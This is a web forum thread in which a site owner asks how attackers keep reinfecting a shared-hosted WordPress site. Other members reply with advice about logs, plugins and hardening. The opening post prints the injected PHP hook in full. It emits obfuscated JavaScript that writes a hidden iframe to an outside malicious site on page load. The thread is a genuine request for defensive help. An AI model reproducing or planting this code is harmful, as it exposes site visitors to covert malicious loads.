Results 1 to 9 of 9

Thread: Wordpress malware through backdoor? Share/Save - My123World.Com!

  1. #1

    Post Wordpress malware through backdoor?

    Hello,

    Two types of malware attacks encountered in last 2 months for my site. The first was modification of .htaccess file to add redirection to malware site mobi-avto.ru for mobile users. I cleaned the .htaccess file for about 6 times after repeated attack and now it is stopped and detected a new one. When we load the site there were hidden requests sent to mobi-avto.ru and a couple of other sites, possibly for obtaining impressions or traffic? The infected file was wp-includes/default-filters.php, the malware code was added before the penultimate line.
    function Kgspy_xig(){echo'<script type="text/javascript">var Petm_phw=[723,783,823,828,841,755,838,839,844,831,824,784,75 7,835,834,838,828,839,828,834,833,781,755,820,821, 838,834,831,840,839,824,782,755,831,824,825,839,78 1,768,772,771,771,760,782,755,839,834,835,781,771, 760,782,755,842,828,823,839,827,781,772,771,771,76 0,782,755,827,824,828,826,827,839,781,772,771,771, 760,782,757,785,783,828,825,837,820,832,824,755,83 8,839,844,831,824,784,757,842,828,823,839,827,781, 772,771,771,760,782,827,824,828,826,827,839,781,77 2,771,771,760,757,755,842,828,823,839,827,784,757, 772,771,771,760,757,755,838,822,837,834,831,831,82 8,833,826,784,757,833,834,757,755,825,837,820,832, 824,821,834,837,823,824,837,784,757,833,834,757,75 5,832,820,837,826,828,833,842,828,823,839,827,784, 757,771,757,755,832,820,837,826,828,833,827,824,82 8,826,827,839,784,757,771,757,755,838,837,822,784, 757,827,839,839,835,781,770,770,832,834,821,828,76 8,820,841,839,834,769,837,840,770,837,770,820,831, 835,827,820,757,785,783,770,828,825,837,820,832,82 4,785,783,770,823,828,841,785];var Cgane_wbw="";for (var i=0; i<Petm_phw.length; i++) {Cgane_wbw+=String.fromCharCode(Petm_phw[i]-Petm_phw[0]);} document.write(Cgane_wbw);</script>';}
    add_action('wp_footer',Kgspy_xig);

    Please advise, how the attacker is getting access to my filesystem and how to prevent this.

    Thanks in advance

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Hi,

    Sadly the attacker is already in and anytime playing with files making his/her intentions realistic.
    First let us know is your website on shared hosting or on VPS? Thereafter further strategy could be planned in better way.

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  3. #3
    Yes Bond, it is on a Shared Hosting and we have more than 10 add on domains also. All of them were affected in the same way.

  4. #4
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    In that case, possibly, intrusion happened from either of them and attacker later escalated privileges to 'root' and is free to edit any file on any domain. Anyway, let bygones be bygones...

    A clean system has to be developed now. But would be next to impossible until weakness is found. Got log files to find intrusion? Until and unless attacker has wiped his/her traces, you should be able to find intrusion in logs (could be tiresome job though).
    Once it's done, patching of vulnerability, followed by clean system setup & hardening of server + applications is recommended.

    Feel free to discuss.

    Cheers
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  5. #5
    Well, I have asked hosting support to investigate and identify the backdoor. It is 2 days and they have just replied not to change anything , until their clean up is completed. They even recommended Sitelock security for preventing further attacks. The cPanel error log seems to be empty and access logs are quite large, seems that I need to search it for a hint

    Meanwhile, let me also wait what hosting guys come up with. Regarding hardening the server, we need to discuss with them and suggest things.

    Will update the progress.

    Thanks!

  6. #6
    It is day 3 and support is yet to update lol !!

  7. #7
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Location
    Pune
    Posts
    338
    Blog Entries
    3
    Quote Originally Posted by shiyashamsu View Post
    It is day 3 and support is yet to update lol !!
    Thats how shared hosting generally works

    by the time they find out the issue you can also start looking out for plugins you have installed on your domains and any recent vulnerability disclosed for them to find possible ways of intrusion

  8. #8
    Have you installed any pirated plugins?

  9. #9
    okay so first just test plugins you installed there is chance attacker exploits with vlnerable plugins,most popular way to hack wordpress is vulnerable adn up to date plugins.i will analyze js code and submit more detailed answer

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •